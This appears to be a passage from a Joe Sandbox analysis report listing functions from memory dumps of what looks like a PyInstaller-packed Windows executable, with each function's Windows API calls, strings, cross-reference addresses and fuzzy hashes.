Could not read full TOC!, xrefs: 00007FF727261AD4
Failed to read cookie!, xrefs: 00007FF7272619BF
fseek, xrefs: 00007FF727261990
malloc, xrefs: 00007FF727261AA8
calloc, xrefs: 00007FF7272619F5
fread, xrefs: 00007FF7272619C6, 00007FF727261ADB
Failed to seek to cookie position!, xrefs: 00007FF727261989
Error on file., xrefs: 00007FF727261B0A
MEI, xrefs: 00007FF727261931
Could not allocate buffer for TOC!, xrefs: 00007FF727261AA1

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _fread_nolock$Message
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 677216364-3497178890
Opcode ID: 1f01653437175558ce4e5f18922edd9f9e16046bcc5bf7555f9ed7af322dcba1
Instruction ID: 6934e41ca30283fc3c18497a4a23dbef5abe6d88ccc5527de1ff4fbb6eef4434
Opcode Fuzzy Hash: 1f01653437175558ce4e5f18922edd9f9e16046bcc5bf7555f9ed7af322dcba1
Instruction Fuzzy Hash: 2671B831E0869685EB60EB15DA502B9A3F0FF46784F94803AD94D87799EF3CF5468F20

Function 00007FF7272615C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF727261785
Failed to create symbolic link %s!, xrefs: 00007FF7272615E2
fseek, xrefs: 00007FF727261695
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7272616EF
malloc, xrefs: 00007FF7272616F6
fopen, xrefs: 00007FF72726161E
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF727261775
Failed to extract %s: failed to open target file!, xrefs: 00007FF727261617
fread, xrefs: 00007FF72726178C
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF72726168E
fwrite, xrefs: 00007FF72726177C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF72726165B

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Message
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2030045667-1550345328
Opcode ID: 0d710443b794d06185ffae1c18c442138d4fea5446e06e267d268dde38ddea3a
Instruction ID: de59183aa67f0e00054de138d9f7f27bb5655f884d9061bb4c9501aa58a8c107
Opcode Fuzzy Hash: 0d710443b794d06185ffae1c18c442138d4fea5446e06e267d268dde38ddea3a
Instruction Fuzzy Hash: E7518C61E0865392EA11BB15AE005B9A3F0FF46794FC4813AED1C47696EF3CF5568B20

Function 00007FF727267FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89
processsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7272686B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF727263FA4,00000000,00007FF727261925), ref: 00007FF7272686E9

SetConsoleCtrlHandler.KERNEL32(?,00007FF7272639C0), ref: 00007FF72726800A
GetStartupInfoW.KERNEL32(?,00007FF7272639C0), ref: 00007FF72726802B

Part of subcall function 00007FF72727978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7272797A0

Part of subcall function 00007FF727277A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727277A93

GetCommandLineW.KERNEL32(?,00007FF7272639C0), ref: 00007FF7272680CD
CreateProcessW.KERNELBASE ref: 00007FF72726810F
WaitForSingleObject.KERNEL32(?,00007FF7272639C0), ref: 00007FF727268123
GetExitCodeProcess.KERNELBASE ref: 00007FF727268133

Strings

Failed to create child process!, xrefs: 00007FF72726813F
CreateProcessW, xrefs: 00007FF727268146

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
String ID: CreateProcessW$Failed to create child process!
API String ID: 2895956056-699529898
Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction ID: 51561d6a7b105bfa0afd7f5b4c5068db42b2a32861e8ff878aafdc766392f1bf
Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
Instruction Fuzzy Hash: F0411231A1878281EA20AB24F9552AAB3F1FBCA360F904339E6AD477D5DF7CD1458F50

Function 00007FF7272611F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF727261295
malloc, xrefs: 00007FF72726129C, 00007FF7272612CA
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF7272613EE
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF7272612C3
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF727261256
1.3.1, xrefs: 00007FF727261229

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Message
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2030045667-2813020118
Opcode ID: b84370ad9c341a229adc785912d60ff625ee95c4118844547039d3285a533b53
Instruction ID: 4193cc692b538aa7e6d13c040d786124b3c918333f9b7012a8ed70fff47e4c19
Opcode Fuzzy Hash: b84370ad9c341a229adc785912d60ff625ee95c4118844547039d3285a533b53
Instruction Fuzzy Hash: D051CA22E0865281E660BB15AE403BAA2F1FB46794FD4813ADD4D477D5EF3CE543CB20

Function 00007FF72727E020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF72727E3BA,?,?,-00000018,00007FF72727A063,?,?,?,00007FF727279F5A,?,?,?,00007FF72727524E), ref: 00007FF72727E19C
GetProcAddress.KERNEL32(?,?,?,00007FF72727E3BA,?,?,-00000018,00007FF72727A063,?,?,?,00007FF727279F5A,?,?,?,00007FF72727524E), ref: 00007FF72727E1A8

Strings

api-ms-, xrefs: 00007FF72727E0E6
ext-ms-, xrefs: 00007FF72727E0F9

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction ID: 7da334ba5bba086bc4c6ff43416cfaecc0bc0d0357efc74eba6e71485b97bda3
Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
Instruction Fuzzy Hash: C541D231F1960281EA15AB16AF00675A3E2FF46BA0F885135DD1D9F784EF3DE8068B30

Function 00007FF727267C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF727263834), ref: 00007FF727267CE4
CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF727263834), ref: 00007FF727267D2C

Part of subcall function 00007FF727267E10: GetEnvironmentVariableW.KERNEL32(00007FF72726365F), ref: 00007FF727267E47
Part of subcall function 00007FF727267E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF727267E69

Part of subcall function 00007FF727277548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF727277561

Part of subcall function 00007FF7272626C0: MessageBoxW.USER32 ref: 00007FF727262736

Strings

TMP, xrefs: 00007FF727267C7C, 00007FF727267D83
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF727267D5E
TMP, xrefs: 00007FF727267CA2
LOADER: failed to set the TMP environment variable., xrefs: 00007FF727267CBC
_MEI%d, xrefs: 00007FF727267CF2

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 740614611-1339014028
Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction ID: c97ddbcc912866e8b1daa67dba66fcef09995d615ad46b29a3cfb1c1ee7c6974
Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
Instruction Fuzzy Hash: 90417011A0965340EA20BF61AF512F9E2F1EF4B780FD0903ADE0D47796EF3CE5068A60

Function 00007FF72727AD6C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72727B199

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
Instruction ID: b3d88e94df5d09ebe88b2d2feb531343c9b4f773837421e253f4a9210b3a7def
Opcode Fuzzy Hash: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
Instruction Fuzzy Hash: 7BC1E422A0C68751EB60AB199F006BEB7F1FB92B90F950131D94D0B791DF7DE8478B20

Function 00007FF727267B50 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF727267B70
OpenProcessToken.ADVAPI32 ref: 00007FF727267B83
GetTokenInformation.KERNELBASE ref: 00007FF727267BA8
GetLastError.KERNEL32 ref: 00007FF727267BB2
GetTokenInformation.KERNELBASE ref: 00007FF727267BF2
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF727267C0E
CloseHandle.KERNEL32 ref: 00007FF727267C26

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction ID: 1f0d4db64090d6647250bc56dac21d88acc5c612581f9e0b8a327322c82439a6
Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
Instruction Fuzzy Hash: 9F217521A0CA4341EB10AF65BA40629F3F1EF967B4F904239D66D43BE4DF7DD4468B20

Function 00007FF7272633E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF727263534), ref: 00007FF727263411

Part of subcall function 00007FF7272629E0: GetLastError.KERNEL32(?,?,?,00007FF72726342E,?,00007FF727263534), ref: 00007FF727262A14
Part of subcall function 00007FF7272629E0: FormatMessageW.KERNEL32(?,?,?,00007FF72726342E), ref: 00007FF727262A7D
Part of subcall function 00007FF7272629E0: MessageBoxW.USER32 ref: 00007FF727262ACF

Strings

Failed to resolve full path to executable %ls., xrefs: 00007FF727263461
Failed to obtain executable path., xrefs: 00007FF72726341B
\\?\, xrefs: 00007FF727263482
GetModuleFileNameW, xrefs: 00007FF727263422
Failed to convert executable path to UTF-8., xrefs: 00007FF7272634B8

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Message$ErrorFileFormatLastModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 517058245-2863816727
Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction ID: d7540c74f90f928b100fd777b72ef7bac2ba2ac41561a2ede2a52ac87d0a382f
Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
Instruction Fuzzy Hash: 13215E61B0954291FA21B724EE513BAD2F0EF4A394FC0913BD56D865D6EF2CE1068B30

Function 000001F91B323790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001F91B32379E
GetCurrentProcess.KERNEL32 ref: 000001F91B3237CC
VirtualProtectEx.KERNEL32 ref: 000001F91B3237EE
GetCurrentProcess.KERNEL32 ref: 000001F91B323809
VirtualProtectEx.KERNEL32 ref: 000001F91B32382A

Strings

wr, xrefs: 000001F91B3237FF

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: ae626e2526dc2842cb9680c78fe3cfcacc565d99c999a4cd0fac7440625693f4
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 73112E3570AB4386EF14AF15E4443AA62A2F784BA5F480435DE8907764EF3DC516C704

Function 000001F91B325B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F91B325B6B
GetThreadContext.KERNEL32 ref: 000001F91B325CD5

Part of subcall function 000001F91B325960: GetCurrentThreadId.KERNEL32 ref: 000001F91B325964

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
Instruction ID: d6580e7e2655b24bfbb5bfe650b0e2b3c7c5f3627d680ca0a9825be828d7b117
Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
Instruction Fuzzy Hash: 4ED1AD36209F4A81DA71AF0AE4943AE77A1F788BD4F150176EA8D47BA5DF3CC551CB00

Function 00007FF727268400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF727267B50: GetCurrentProcess.KERNEL32 ref: 00007FF727267B70
Part of subcall function 00007FF727267B50: OpenProcessToken.ADVAPI32 ref: 00007FF727267B83
Part of subcall function 00007FF727267B50: GetTokenInformation.KERNELBASE ref: 00007FF727267BA8
Part of subcall function 00007FF727267B50: GetLastError.KERNEL32 ref: 00007FF727267BB2
Part of subcall function 00007FF727267B50: GetTokenInformation.KERNELBASE ref: 00007FF727267BF2
Part of subcall function 00007FF727267B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF727267C0E
Part of subcall function 00007FF727267B50: CloseHandle.KERNEL32 ref: 00007FF727267C26

LocalFree.KERNEL32(?,00007FF727263814), ref: 00007FF72726848C
LocalFree.KERNEL32(?,00007FF727263814), ref: 00007FF727268495

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF727268462
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7272684A3
S-1-3-4, xrefs: 00007FF727268441
D:(A;;FA;;;%s), xrefs: 00007FF727268477

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
Instruction ID: f706e5ae5ff49b32c817ffc02753c65bdc1cf30935e474e9f2db6dc9505d47d7
Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
Instruction Fuzzy Hash: 88213021A0864281F610BB11EE153EAA2F1FF8A780FD4803AEA4D57796DF3DD5468B60

Function 000001F91B321A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001F91B321A60
StrCmpNIW.SHLWAPI ref: 000001F91B321A7A
lstrlenW.KERNEL32 ref: 000001F91B321A89
StrCpyW.SHLWAPI ref: 000001F91B321A9E

Strings

\\?\, xrefs: 000001F91B321A6E

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: bad3983c209706a862f985ca5347f50916ceb6da670f5fd2ef7754fd0d59a958
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 4BF0317270DA8392F760AF21E9947AA6762F748BE8F884030DA4946564DE7CC65ECB00

Function 000001F91B3250D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001F91B325156

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
Instruction ID: 4ceb33a64c3d040630e9184daae9a524691a7227a813c734a7b93e729410ee41
Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
Instruction Fuzzy Hash: 8B02C93221EB8686EB60DF55E4903AEB7A1F3C4790F151075EA8E87BA8DB7CC555CB00

Function 00007FF72727C270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72727C25B), ref: 00007FF72727C38C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72727C25B), ref: 00007FF72727C417

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction ID: 49331cfd8f6c822c206d33c88c8e12988b968b844c2899651d9cff5fb1cbb5c4
Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
Instruction Fuzzy Hash: 46910622E0965185F710AF759F5027DA7F5FB02B88F941139CE0E6AA84CF38D4838B20

Function 00007FF727274938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF727274965
CreateFileW.KERNELBASE ref: 00007FF7272749A4
CloseHandle.KERNEL32 ref: 00007FF7272749D9

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction ID: 11f2d6986d0de873f9c71a8d362d6a1893df524febc0c04c537d969a13828c78
Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
Instruction Fuzzy Hash: 5641B822D1878183F714AB219B10379B2B0FB96764F509334D65C0BAD5EF7CA1E18B20

Function 00007FF72726BF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

